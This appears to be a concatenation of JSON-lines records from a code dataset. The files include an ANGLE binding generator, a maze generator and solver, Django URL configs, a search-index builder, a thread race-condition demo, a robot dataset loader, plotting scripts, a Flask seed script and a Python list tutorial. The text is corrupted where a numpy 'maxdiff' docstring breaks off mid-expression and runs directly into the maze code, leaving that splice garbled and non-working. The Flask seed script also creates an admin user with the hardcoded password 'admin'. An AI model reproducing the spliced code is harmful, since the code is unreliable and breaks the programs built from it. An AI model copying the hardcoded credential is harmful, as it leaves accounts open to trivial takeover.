src/ui/gl/generate_bindings.py,\n # so we provide them here.\n symbolMapping.update({\n 'glTexImage3DOES': {\n 'return_type': 'void',\n 'arguments': 'GLenum target, GLint level, GLenum internalformat, '\n 'GLsizei width, GLsizei height, GLsizei depth, '\n 'GLint border, GLenum format, GLenum type, '\n 'const GLvoid* pixels',\n },\n 'glReadnPixelsEXT': {\n 'return_type': 'void',\n 'arguments': 'GLint x, GLint y, GLsizei width, GLsizei height, '\n 'GLenum format, GLenum type, GLsizei bufSize, void *data',\n },\n 'glGetnUniformfvEXT': {\n 'return_type': 'void',\n 'arguments': 'GLuint program, GLint location, GLsizei bufSize, '\n 'GLfloat* params',\n },\n 'glGetnUniformivEXT': {\n 'return_type': 'void',\n 'arguments': 'GLuint program, GLint location, GLsizei bufSize, 
'\n 'GLint* params',\n },\n 'SetTraceFunctionPointers': {\n 'return_type': 'void',\n 'arguments': 'GetCategoryEnabledFlagFunc get_category_enabled_flag, '\n 'AddTraceEventFunc add_trace_event_func',\n },\n })\n\n fCC.write('// generated file -- DO NOT EDIT\\n')\n fCC.write('#include \\n')\n fCC.write('\\n')\n fCC.write('extern \"C\" {\\n')\n fCC.write('\\n')\n fCC.write('typedef void GLvoid;\\n')\n fCC.write('typedef char GLchar;\\n')\n fCC.write('typedef unsigned int GLenum;\\n')\n fCC.write('typedef unsigned char GLboolean;\\n')\n fCC.write('typedef unsigned int GLbitfield;\\n')\n fCC.write('typedef signed char GLbyte;\\n')\n fCC.write('typedef short GLshort;\\n')\n fCC.write('typedef int GLint;\\n')\n fCC.write('typedef int GLsizei;\\n')\n fCC.write('typedef unsigned char GLubyte;\\n')\n fCC.write('typedef unsigned short GLushort;\\n')\n fCC.write('typedef unsigned int GLuint;\\n')\n fCC.write('typedef float GLfloat;\\n')\n fCC.write('typedef float GLclampf;\\n')\n fCC.write('typedef __int32 GLfixed;\\n')\n fCC.write('typedef signed long int GLintptr;\\n')\n fCC.write('typedef signed long int GLsizeiptr;\\n')\n fCC.write('\\n')\n fCC.write('typedef HDC EGLNativeDisplayType;\\n')\n fCC.write('typedef HBITMAP EGLNativePixmapType;\\n')\n fCC.write('typedef HWND EGLNativeWindowType;\\n')\n fCC.write('typedef __int32 EGLint;\\n')\n fCC.write('typedef unsigned int EGLBoolean;\\n')\n fCC.write('typedef unsigned int EGLenum;\\n')\n fCC.write('typedef void *EGLConfig;\\n')\n fCC.write('typedef void *EGLContext;\\n')\n fCC.write('typedef void *EGLDisplay;\\n')\n fCC.write('typedef void *EGLSurface;\\n')\n fCC.write('typedef void *EGLClientBuffer;\\n')\n fCC.write('\\n')\n fCC.write('typedef const unsigned char* (*GetCategoryEnabledFlagFunc)(const char* name);\\n')\n fCC.write('typedef void (*AddTraceEventFunc)(char phase, const unsigned char* categoryGroupEnabled, const char* name,\\n')\n fCC.write(' unsigned long long id, int numArgs, const char** argNames,\\n')\n fCC.write(' const unsigned char* argTypes, const unsigned long long* argValues,\\n')\n fCC.write(' unsigned char flags);\\n')\n fCC.write('\\n')\n fCC.write('typedef void (__stdcall *angleFunctionPointer)(void);\\n')\n fCC.write('typedef angleFunctionPointer __eglMustCastToProperFunctionPointerType;\\n')\n fCC.write('\\n')\n for sym in symbols:\n func = symbolMapping[sym]\n fCC.write(func['return_type'] + ' __stdcall ' + sym + '(' + func['arguments'] + ');\\n')\n fCC.write('\\n')\n fCC.write('angleFunctionPointer __stdcall blpangle_getProcAddress(const char* name)\\n')\n fCC.write('{\\n')\n fCC.write(' struct Func {\\n')\n fCC.write(' const char* name;\\n')\n fCC.write(' angleFunctionPointer address;\\n')\n fCC.write(' };\\n')\n fCC.write('\\n')\n fCC.write(' static const Func funcs[] = {\\n')\n for symbol in symbols:\n fCC.write(' {\"' + symbol + '\", (angleFunctionPointer)' + symbol + '},\\n')\n fCC.write(' };\\n')\n fCC.write('\\n')\n fCC.write(' for (int i = 0; i < sizeof(funcs) / sizeof(Func); ++i) {\\n')\n fCC.write(' if (0 == strcmp(name, funcs[i].name)) {\\n')\n fCC.write(' return funcs[i].address;\\n')\n fCC.write(' }\\n')\n fCC.write(' }\\n')\n fCC.write('\\n')\n fCC.write(' return eglGetProcAddress(name);\\n')\n fCC.write('}\\n')\n fCC.write('\\n')\n fCC.write('} /* extern C */ \\n')\n\n\ndef doMain(args):\n inputDefs = []\n bindingsCCFile = None\n\n for i in range(len(args)):\n if args[i].endswith('.def'):\n inputDefs.append(args[i])\n elif args[i] == '--output-bindings-cc':\n bindingsCCFile = args[i+1]\n\n 
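    # sanity checks: doMain needs at least one input .def file and an --output-bindings-cc path before it can proceed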
assert(inputDefs)\n    assert(bindingsCCFile)\n\n    symbols = []\n\n    for inputDef in inputDefs:\n        with open(inputDef, 'r') as f:\n            for ln in f.readlines():\n                ln = ln.strip()\n                if -1 == ln.find('@'): continue\n                if -1 != ln.find('NONAME'): continue\n                symbol = ln.split('@')[0].strip()\n                symbols.append(symbol)\n\n    with open(bindingsCCFile, 'w') as fCC:\n        writeBindingCCFile(fCC, symbols)\n\n\nif __name__ == '__main__':\n    doMain(sys.argv[1:])\n","sub_path":"src/blpwtk2/gen_angle_bindings.py","file_name":"gen_angle_bindings.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"145646605","text":"import numpy as np\n\n\ndef maxdiff(arr):\n \"\"\"Calculates the max arr[j]-arr[i] where i altura - 1:\n entradax = altura - 1\n if entraday > largura - 1:\n entraday = largura - 1\n if saidax > altura - 1:\n saidax = altura - 1\n if saiday > largura - 1:\n saiday = largura - 1\n\n\n\n vert = []\n num_vert = 0\n\n for i in range(altura):\n vert.append([])\n for j in range(largura):\n vert[i].append(num_vert)\n num_vert += 1\n\n adjacencia = []\n rand.seed()\n\n # initialize the adjacency matrix\n for i in range(altura*largura):\n adjacencia.append([])\n for j in range(altura*largura):\n adjacencia[i].append(0)\n\n # build the adjacency matrix: each grid position is a node, and from each node the directed edges are set\n for i in range(altura):\n for j in range(largura):\n if j+1 < largura: # right, if it exists\n adjacencia[vert[i][j]][vert[i][j+1]] = int(rand.random() * 99)+1 \n if j-1 >= 0: # left, if it exists \n adjacencia[vert[i][j]][vert[i][j-1]] = int(rand.random() * 99)+1 \n if i+1 < altura: # below, if it exists\n adjacencia[vert[i][j]][vert[i+1][j]] = int(rand.random() * 99)+1\n if i-1 >= 0: # above, if it exists\n adjacencia[vert[i][j]][vert[i-1][j]] = int(rand.random() * 99)+1\n\n\n cont = 0\n for i in range(altura*largura):\n for j in range(cont):\n adjacencia[i][j] = adjacencia[j][i]\n cont += 1\n\n # Prim\n\n\n def procurar_vertice(vertices, desejado):\n for altura_vert in range(len(vertices)):\n for largura_vert in range(len(vertices[0])):\n if vertices[altura_vert][largura_vert] == desejado:\n return altura_vert, largura_vert\n\n\n def procurar_menor_aresta(visitado, adjacencia):\n saida_aresta = 0\n entrada_aresta = 0\n for altura_aresta in range(len(visitado)): # visit every vertex in the visited list\n menor = 100\n for largura_aresta in range(altura*largura): # try every possible edge from that vertex\n if adjacencia[visitado[altura_aresta]][largura_aresta] > 0: # only consider non-zero edges\n if menor > adjacencia[visitado[altura_aresta]][largura_aresta]: # keep the smallest edge\n if largura_aresta not in list(visitado): # only allowed if the target vertex has not been visited yet\n menor = adjacencia[visitado[altura_aresta]][largura_aresta]\n saida_aresta = visitado[altura_aresta] # the source is the vertex currently being analysed\n entrada_aresta = largura_aresta # the target is the adjacency column (entry vertex)\n\n return menor, saida_aresta, entrada_aresta\n\n # list of visited vertices for PRIM's algorithm, initialized with the starting vertex\n visitado = [0]\n\n # adjacency matrix of the minimum-spanning-tree maze\n adjacencia_menor = []\n # initialize the adjacency matrix\n for i in range(altura*largura):\n adjacencia_menor.append([])\n for j in range(altura*largura):\n adjacencia_menor[i].append(0)\n\n # only stops once every vertex has been visited\n while len(visitado) != altura*largura:\n peso, saida_vertice, entrada_vertice = procurar_menor_aresta(visitado, adjacencia)
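        # classic Prim step: the cheapest edge leaving the visited set was just picked; record it symmetrically below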
\n visitado.append(entrada_vertice)\n adjacencia_menor[saida_vertice][entrada_vertice] = peso\n adjacencia_menor[entrada_vertice][saida_vertice] = peso\n\n\n # Dijkstra\n\n vert_dji = []\n \n for i in range(altura):\n vert_dji.append([])\n for j in range(largura):\n vert_dji[i].append(9999)\n\n\n vert_dji[entradax][entraday] = 0\n\n nao_visitado_dji = []\n for i in range(altura*largura):\n nao_visitado_dji.append(i)\n\n visitado_dji = []\n proximo = [nao_visitado_dji.pop(vert[entradax][entraday])] \n proximo_bloco = []\n\n\n # stops either once everything is visited or when the exit position is reached\n while len(visitado_dji) != altura*largura and len(proximo) != 0:\n if proximo[0] == vert[saidax][saiday]:\n visitado_dji.append(proximo.pop(0))\n break\n\n for i in range(altura*largura):\n if adjacencia_menor[proximo[0]][i] > 0: # walk the adjacency matrix and check which paths can be taken\n x, y = procurar_vertice(vert, i) # helper that returns the grid coordinates of the vertex\n if vert_dji[x][y] > adjacencia_menor[proximo[0]][i] and vert_dji[x][y] == 9999:\n x_atual, y_atual = procurar_vertice(vert, proximo[0]) # if the path has not been taken yet, it becomes a next step\n vert_dji[x][y] = vert_dji[x_atual][y_atual] + 1 # the next vertex gets the previous distance + 1\n proximo_bloco.append(i) # push it onto the stack of upcoming vertices\n nao_visitado_dji.remove(i) # drop it from the unvisited list\n\n # pop from the next list and move it to visited\n visitado_dji.append(proximo.pop(0))\n if len(proximo) == 0: # when the current block of next vertices runs out, swap in the new block\n proximo = proximo_bloco\n proximo_bloco = []\n\n\n# Once the exit is reached, walk the path back from it, marking cells up to the entrance\n\n adjacencia_dji = [[saidax, saiday]]\n atual_x = saidax\n atual_y = saiday\n\n # keep going until the start is reached\n while (atual_x != entradax) or (atual_y != entraday):\n for i in range(largura*altura): # visit every possible neighbour\n if adjacencia_menor[vert[atual_x][atual_y]][i] > 0: # see which ones are available\n proximo_x, proximo_y = procurar_vertice(vert, i) # store the available one\n if vert_dji[proximo_x][proximo_y] < vert_dji[atual_x][atual_y]:\n # check whether the available one has a smaller distance (i.e. it lies on the correct path)\n adjacencia_dji.insert(0, [atual_x, atual_y]) # if so, prepend it to the path\n atual_x, atual_y = proximo_x, proximo_y # move on to the next vertex\n\n adjacencia_dji.insert(0, [entradax, entraday])\n\n \n resposta = [] \n\n # assembling the maze grids here\n for i in range((altura*2)+1):\n resposta.append([])\n for j in range((largura*2)+1):\n resposta[i].append(0)\n \n\n # scale the dimensions up for better visualization\n\n for i in range(altura):\n for j in range(largura):\n resposta[(i * 2) + 1][(j * 2) + 1] = 1\n \n\n\n # walls\n for i in range(altura*largura):\n for j in range(altura*largura):\n if adjacencia_menor[i][j] != 0:\n x_i, y_i = procurar_vertice(vert, i)\n x_i, y_i = (x_i * 2) + 1, (y_i * 2) + 1\n x_j, y_j = procurar_vertice(vert, j)\n x_j, y_j = (x_j * 2) + 1, (y_j * 2) + 1\n resposta[int((x_i + x_j) / 2)][int((y_i + y_j) / 2)] = 1\n \n\n for i in range(len(visitado_dji)):\n resp_x, resp_y = procurar_vertice(vert, visitado_dji[i])\n resp_x, resp_y = (resp_x * 2) + 1, (resp_y * 2) + 1\n \n \n\n vetor_resposta = []\n\n \n for i in range(len(adjacencia_dji) - 1):\n resp_x, resp_y = adjacencia_dji[i]\n resp_x, resp_y = (resp_x * 2) + 1, (resp_y * 2) + 1\n vetor_resposta.append([resp_x, resp_y])\n\n anterior_x, anterior_y = adjacencia_dji[i]\n posterior_x, posterior_y = adjacencia_dji[i + 1]
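        # in the doubled grid, consecutive path cells sit 2 apart, so their midpoint is the passage cell painted below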
\n anterior_x, anterior_y = (anterior_x * 2) + 1, (anterior_y * 2) + 1\n posterior_x, posterior_y = (posterior_x * 2) + 1, (posterior_y * 2) + 1\n if resposta[int((anterior_x + posterior_x) / 2)][int((anterior_y + posterior_y) / 2)] == 1:\n vetor_resposta.append([int((anterior_x + posterior_x) / 2), int((anterior_y + posterior_y) / 2)])\n\n for i in range(len(vetor_resposta)):\n resp_x, resp_y = vetor_resposta[i]\n resposta[resp_x][resp_y] = 2\n\n \n resposta[(entradax * 2) + 1][(entraday * 2) + 1] = 3\n resposta[(saidax * 2) + 1][(saiday * 2) + 1] = 4\n\n\n \n labirinto = []\n for i in range((altura*2)+1):\n labirinto.append([])\n for j in range((largura*2)+1):\n labirinto[i].append(0)\n\n\n for i in range(altura):\n for j in range(largura):\n labirinto[(i*2)+1][(j*2)+1] = 1\n\n \n for i in range(altura*largura):\n for j in range(altura*largura):\n if adjacencia_menor[i][j] != 0:\n x_i, y_i = procurar_vertice(vert, i)\n x_i, y_i = (x_i * 2) + 1, (y_i * 2) + 1\n x_j, y_j = procurar_vertice(vert, j)\n x_j, y_j = (x_j * 2) + 1, (y_j * 2) + 1\n labirinto[int((x_i+x_j)/2)][int((y_i+y_j)/2)] = 1\n\n labirinto[(entradax * 2) + 1][(entraday * 2) + 1] = 2\n labirinto[(saidax * 2) + 1][(saiday * 2) + 1] = 3\n\n\n\n \n cores = ([\"#551A8B\", \"#F0FFFF\", \"#7FFFD4\", \"#7FFF00\"])\n cmap = ListedColormap(cores)\n plt.figure('Original maze')\n plt.pcolormesh(labirinto, cmap=cmap)\n plt.axis(\"equal\")\n plt.xticks([])\n plt.yticks([])\n \n \n \n cores = ([\"#551A8B\", \"#F0FFFF\", \"#FFB90F\", \"#7FFFD4\", \"#7FFF00\"])\n cmap = ListedColormap(cores)\n plt.figure('Solution path of the original maze')\n plt.pcolormesh(resposta, cmap=cmap)\n plt.axis(\"equal\")\n plt.xticks([])\n plt.yticks([])\n \n\n plt.show()\n\n\n# main\napp = QApplication([])\nex = Maze()\napp.exec_()\n","sub_path":"Labirinto - Boty, Dreka, Calebe/maze_BMR.py","file_name":"maze_BMR.py","file_ext":"py","file_size_in_byte":12824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"352470250","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom tasks.views import GoalManagerView, TaskManagerView, SubTaskManagerView\n\nurlpatterns = [\n path('project/', GoalManagerView.as_view(), name='task'),\n path('project/', GoalManagerView.as_view(), name='task-update'),\n path('task/', TaskManagerView.as_view(), name='task'),\n path('task//', TaskManagerView.as_view(), name='create-task'),\n path('subtask//', SubTaskManagerView.as_view(), name='subtask'),\n]\n","sub_path":"tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"126336429","text":"import jieba\nfrom data.server import Data\nimport json\nfrom common.common import common_tools as common\n\n\n\n\nstrip_word_list = ['\\n',' ']\n\n\ndef split_case_info(case):\n title = case['title']\n content = json.loads(case['content'])\n title_list = list(jieba.cut_for_search(title))\n content_list = list(jieba.cut_for_search(content))\n\n case_list = title_list+content_list\n case_word_list = list(set(case_list))\n\n # print(case_list)\n for word in case_word_list:\n if word not in strip_word_list:\n word_md5 = common.get_md5(word)\n res = Data.find('case_search_index',[('case_id','=',case['id']),('keyword_md5','=',word_md5)])\n if res is not None:\n print('already exists')\n continue\n params = {\n 'case_id':case['id'],\n 'keyword':json.dumps(word),\n 
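# the keyword's md5 doubles as a fixed-length index key -- it is what the duplicate check above queries on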
'keyword_md5':word_md5\n }\n Data.insert('case_search_index',params)\n continue\n else:\n continue\n\n\n\n # for i in case_list:\n\n# def \nall_case = Data.select('case_info',[('id','!=',0)])\n\nfor case in all_case:\n split_case_info(case)\n\nfrom data.server import Data\nfrom common.common import common_tools as common\n\ndef kill_md():\n all_info = Data.select('case_info',[('id','!=',0)])\n for line in all_info:\n res = common.decode_base64(line['title'])\n # print(res)\n case_title_list = res.split('.')\n if len(case_title_list) >=2:\n if case_title_list[1] == 'md':\n print(case_title_list[0])\n new_title = common.get_base64(case_title_list[0].encode('utf-8'))\n Data.update('case_info',[('id','=',line['id'])],{'title':new_title})\n\n","sub_path":"server/src/split_word.py","file_name":"split_word.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"459765526","text":"# This file is an example of race conditions in python\nfrom concurrent.futures import ThreadPoolExecutor\n\ncounter = 0\n\ndef change_counter(amount):\n global counter\n for _ in range(10000):\n counter += amount\n\ndef race(num_threads):\n global counter\n counter = 0\n data = [-1 if x%2 else 1 for x in range(1000)]\n\n with ThreadPoolExecutor(max_workers=num_threads) as executor:\n executor.map(change_counter, data)\n\n print(counter)","sub_path":"race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"444564523","text":"from __future__ import unicode_literals, print_function, division\nfrom io import open\nimport glob\nimport os\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport pandas as pd\n\n\"\"\"This section reads in the data\n Input: file paths to the text files that contains words of different languaes\n Output: A dictionary with language as the index that contains the lines of the text files\n\"\"\"\n\n\n\n\"\"\"split data into actions and object coordinates\"\"\"\ndef splitDataCoordinatesActions(data):\n\n #coordinates1 = data[:, 0:34]\n #coordinates2 = data[:, 34:68]\n\n coordinates1 = data[:, 0:28]\n coordinates2 = data[:, 28:56]\n\n return coordinates1, coordinates2\n\n\n\nclass BaxterDataset(Dataset):\n\n def __init__(self):\n\n # filePathTrain = '../../BoxData5.8.2020/primitive data filtering 5.8.csv'\n #filePathTrain = '../../BoxData5.14.2020/primitive data filtering 5.17.csv'\n #filePathTrain = '../../BoxData5.14.2020/primitive data filtering 5.20.csv'\n filePathTrain = '../../BoxData5.14.2020/primitive data filtering 5.20 test.csv'\n\n\n xy = pd.read_csv(filePathTrain)\n self.xraw, self.yraw= selectRowsRNN6Locations(xy)\n self.x = torch.tensor(self.xraw.values)\n\n\n self.c, self.f = splitDataCoordinatesActions(self.x)\n\n\n self.y = torch.tensor(self.yraw.values)\n\n time = []\n for i in range(0, self.x.size()[0]):\n time.append(i)\n self.t = torch.tensor(time).unsqueeze(1)\n\n\n def __getitem__(self, index):\n return self.c[index], self.f[index], self.y[index], self.t[index]\n\n def __len__(self):\n return self.c.size()[0]\n\n\n\n\"\"\"Model can predict the mass\"\"\"\ndef selectRowsRNN6Locations(data):\n features = data[['right_gripper_pole_x_1',\n 'right_gripper_pole_y_1',\n 'right_gripper_pole_z_1',\n\n 'right_gripper_pole_q_11',\n 'right_gripper_pole_q_12',\n 'right_gripper_pole_q_13',\n 'right_gripper_pole_q_14',\n\n 
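# left-arm gripper pose at timestep 1: position (x, y, z) followed by the quaternion components (q1..q4)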
'left_gripper_pole_x_1',\n 'left_gripper_pole_y_1',\n 'left_gripper_pole_z_1',\n 'left_gripper_pole_q_11',\n 'left_gripper_pole_q_12',\n 'left_gripper_pole_q_13',\n 'left_gripper_pole_q_14',\n\n\n\n 'table1_x_1',\n 'table1_y_1',\n 'table1_z_1',\n\n 'table1_quat1_1',\n 'table1_quat2_1',\n 'table1_quat3_1',\n 'table1_quat4_1',\n\n 'table2_x_1',\n 'table2_y_1',\n 'table2_z_1',\n\n 'table2_quat1_1',\n 'table2_quat2_1',\n 'table2_quat3_1',\n 'table2_quat4_1',\n\n\n 'right_gripper_pole_x_2',\n 'right_gripper_pole_y_2',\n 'right_gripper_pole_z_2',\n\n 'right_gripper_pole_q_21',\n 'right_gripper_pole_q_22',\n 'right_gripper_pole_q_23',\n 'right_gripper_pole_q_24',\n\n 'left_gripper_pole_x_2',\n 'left_gripper_pole_y_2',\n 'left_gripper_pole_z_2',\n 'left_gripper_pole_q_21',\n 'left_gripper_pole_q_22',\n 'left_gripper_pole_q_23',\n 'left_gripper_pole_q_24',\n\n 'table1_x_2',\n 'table1_y_2',\n 'table1_z_2',\n\n 'table1_quat1_2',\n 'table1_quat2_2',\n 'table1_quat3_2',\n 'table1_quat4_2',\n\n 'table2_x_2',\n 'table2_y_2',\n 'table2_z_2',\n\n 'table2_quat1_2',\n 'table2_quat2_2',\n 'table2_quat3_2',\n 'table2_quat4_2',\n\n\n\n ]]\n\n labels = data[[\n\n\n 'Index',\n ]]\n\n\n\n return features, labels\n","sub_path":"Peg In Hole HDR-IL/B1DataProcessing.py","file_name":"B1DataProcessing.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"289431043","text":"\"\"\"empty message\n\nRevision ID: cb89f3210d2c\nRevises: 5fa21fe778c6\nCreate Date: 2019-04-22 20:30:35.408751\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cb89f3210d2c'\ndown_revision = '5fa21fe778c6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('graph', sa.Column('b64', sa.String(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('graph', 'b64')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/cb89f3210d2c_.py","file_name":"cb89f3210d2c_.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50015562","text":"import pygame as p #to simplify and shorten\r\n\r\np.font.init() #initiate font elements\r\n\r\n#sets the display width and height\r\nwidth = 800\r\nheight = 600\r\n\r\n#handles making messages like titles and other text objects\r\nclass Message:\r\n def __init__(self, text, x, y, colour, size):\r\n self.text = text #sets text to equal text\r\n self.x = x #sets x to equal x\r\n self.y = y #sets y to equal y\r\n self.width = 180 #sets the width\r\n self.height = 120 #sets the height\r\n self.colour = colour #sets colour to equal colour\r\n self.size = size #sets size to equal size\r\n\r\n #renders the text in that font and returns it to draw\r\n def text_objects(self, text, font, colour):\r\n #renders the text with the choosen colour\r\n text_surf = font.render(str(text), True, colour)\r\n #returns the text surface\r\n return text_surf, text_surf.get_rect()\r\n\r\n #collects the text surface to draw text\r\n def draw(self, gameDisplay):\r\n #gets the choosen font and size to render later\r\n text_font = p.font.SysFont(\"comicsansms\", self.size)\r\n #gets the text surface\r\n text_surf, text_rect = self.text_objects(self.text, text_font, self.colour)\r\n #finds the center of the text\r\n text_rect.center = ((self.x + (self.width / 2)), (self.y + (self.height / 2)))\r\n #blits the text to the game display\r\n gameDisplay.blit(text_surf, text_rect)\r\n","sub_path":"v1.3/modules/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"242648028","text":"# coding=utf-8\n# __author__ = 'doriswang'\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n\nfile_name = '/Users/doriswang/Desktop/popCompare/L10/force_seq/likelihood/samplePost.txt'\ninput_file = open(file_name, 'r')\n\ngfile_name = '/Users/doriswang/Desktop/popCompare/L10/seq/likelihood/samplePost.txt'\nginput_file = open(gfile_name, 'r')\n\ngfile_name1 = '/Users/doriswang/Desktop/popCompare/L10/true_seq/likelihood/samplePost.txt'\nginput_file1 = open(gfile_name1, 'r')\n\ngfile_name2 = '/Users/doriswang/Desktop/popCompare/L10/true_seq_test/likelihood/samplePost.txt'\nginput_file2 = open(gfile_name2, 'r')\n\nlines = input_file.readlines()\nglines = ginput_file.readlines()\nglines1 = ginput_file1.readlines()\nglines2 = ginput_file2.readlines()\n\n\nx = []\nx1 = []\ny = []\ny1 = []\nx2 = []\ny2 = []\nx3 = []\ny3 = []\nstart = 0\nend = 100\ncounter = 0\n\nfor line in lines:\n counter += 1\n if (counter < start):\n continue\n #a = line.split(\"\\t\")\n x.append(counter)\n y.append(float(line))\n if (counter > end):\n break\n\n\n\ncounter = 0\nfor gline in glines:\n counter += 1\n if (counter < start):\n continue\n #a = gline.split(\"\\t\")\n x1.append(counter)\n y1.append(float(gline))\n if (counter > end):\n break\n\ncounter = 0\nfor gline1 in glines1:\n counter += 1\n if (counter < start):\n continue\n #a = gline.split(\"\\t\")\n x2.append(counter)\n y2.append(float(gline1))\n if (counter > end):\n break\n\n\ncounter = 0\nfor gline2 in glines2:\n counter += 1\n if (counter < start):\n continue\n #a = gline.split(\"\\t\")\n x3.append(counter)\n y3.append(float(gline2))\n if (counter > 
end):\n break\n\ninput_file.close()\nginput_file.close()\nginput_file1.close()\nginput_file2.close()\ny[len(y)-1] = y[len(y)-2]\ny1[len(y1)-1] = y1[len(y1)-2]\ny2[len(y2)-1] = y2[len(y2)-2]\ny3[len(y3)-1] = y3[len(y3)-2]\nfig = plt.figure(figsize=(18,6)) # create the figure object\n\nplt.plot(x, y, 'b', linewidth=1, label='MCMC_SEQ+CGT_output')\nplt.plot(x1, y1, 'r', linewidth=1, label='Normal MCMC_SEQ')\nplt.plot(x2, y2, 'g', linewidth=1, label='True start(pop=theta/2)')\nplt.plot(x3, y3, 'k', linewidth=1, label='True start(pop=theta/4)')\n\n\nplt.title(\"Posterior for all samples\") # chart title\nplt.legend()\nplt.savefig(\"line.jpg\") # save the figure (must run before plt.show(), which discards the figure)\nplt.show()\n","sub_path":"CGT_Plot/popTest.py","file_name":"popTest.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"8143577","text":"from django.conf.urls.defaults import *\nfrom django.core.paginator import Paginator\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nfrom foa.settings import MEDIA_ROOT\nfrom foa.products.models import Product\n\nfrom foa.products.views import move_to_product\n\nurlpatterns = patterns('',\n (r'^site_media/(.*)$', 'django.views.static.serve', {'document_root': MEDIA_ROOT}),\n (r'^admin/(.*)$', admin.site.root),\n (r'^products/(?P[a-z_]+)/(?P[a-z_]+)/$', move_to_product),\n)\n\nurlpatterns += patterns('django.views.generic.simple',\n (r'^$', 'direct_to_template', {'template':'index.html'}, \"index\"),\n (r'^sitemap.xml$', 'direct_to_template', {'template':'sitemap.xml'}, \"sitemap\"),\n (r'^robots.txt$', 'direct_to_template', {'template':'robots.txt'}, \"robots\"),\n (r'^about/$', 'direct_to_template', {'template':'about.html'}, \"about\"),\n (r'^products/cancel/$', 'direct_to_template', {'template':'cancel.html'}, \"cancel\"),\n (r'^products/thanks/$', 'direct_to_template', {'template':'thanks.html'}, \"thanks\"),\n (r'^paypal_help/$', 'direct_to_template', {'template':'paypal_help.html'}, \"paypal_help\"),\n (r'^privacy_policy/$', 'direct_to_template', {'template':'privacy_policy.html'}, \"privacy_policy\"),\n (r'^coming_soon/$', 'direct_to_template', {'template':'coming_soon.html'}, \"coming_soon\"),\n\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs' \n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n)\n\nall_products = Product.objects.filter(visible=True)\ngeeky_products = all_products.filter(category=\"G\")\ncheeky_products = all_products.filter(category=\"C\")\n\nurlpatterns += patterns ('django.views.generic.list_detail',\n (r'^products/$', 'object_list', {'queryset': all_products,'template_name':'products.html'}, \"products\"),\n (r'^products/geeky/$', 'object_list', {'queryset': geeky_products,'template_name':'geeky.html'}, \"geeky\"),\n (r'^products/cheeky/$', 'object_list', {'queryset': cheeky_products,'template_name':'cheeky.html'}, \"cheeky\"),\n (r'^products/(?P[a-z_]+)/$', 'object_detail', {'queryset': all_products, 'template_name':'product_detail.html'}, \"products\"),\n)\n\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"281189638","text":"from datetime import date\n\nfrom project import db\nfrom project.models import Task, User\n\n\n# create the database and the db table\ndb.create_all()\n\nadmin = User(username=\"admin\", email=\"admin@gmail.com\", 
role=\"admin\")\nadmin.set_password(\"admin\")\n\n# insert data\ndb.session.add(admin)\ndb.session.add(Task(name=\"Finish this tutorial\",\n due_date=date(2016, 9, 22),\n priority=10,\n posted_date=date(2016, 9, 22),\n status=1,\n user_id=1))\ndb.session.add(Task(name=\"Finish Real tutorial\",\n due_date=date(2016, 9, 22),\n priority=10,\n posted_date=date(2016, 9, 22),\n status=1,\n user_id=1))\ndb.session.commit()\n","sub_path":"db_create.py","file_name":"db_create.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"221452222","text":"######### Gray magic: methods provided by the list class ##########\n# Lists are ordered and their elements can be modified\n# object.method(...)  e.g. the li object calls the append method\nli = [11,22,33,44]\n# arguments\n\n# append\n# 1. append to the end of the existing values\nli.append(5)\nli.append(\"alex\")\nli.append([1234,54654])\nprint(li)\n\n# 2. clear the list\nli2 = [111,521,54442]\nli2.clear()\nprint(li2)\n\n# 3. copy (a shallow copy)\nv = li.copy()\nprint(v)\n\n# 4. count how many times an element occurs\nv2 = li.count(22)\nprint(v2)\n\n# 5. extend the original list; the argument is any iterable\nli3 = [11,22,33,44]\nli3.extend([9898,\"不得了\"])\nprint(li3)\nli3.extend(\"不得了\")\nprint(li3)\n\n# 6. get the index of a value (leftmost match first)\nli4 = [11,22,33,22,44]\nq = li4.index(22)\nprint(q)\n# 7. insert an element at the given index\nli4.insert(0,999)\nprint(li4)\n# index is the position, value is the element\n\n# 8. remove the value at an index and return the removed value\n# without an argument, the last element is removed\nli5 = [11,22,33,44]\ne = li5.pop(1)\nprint(li5)\nprint(e)\n# 9. remove the given value from the list, leftmost match first\nli6 = 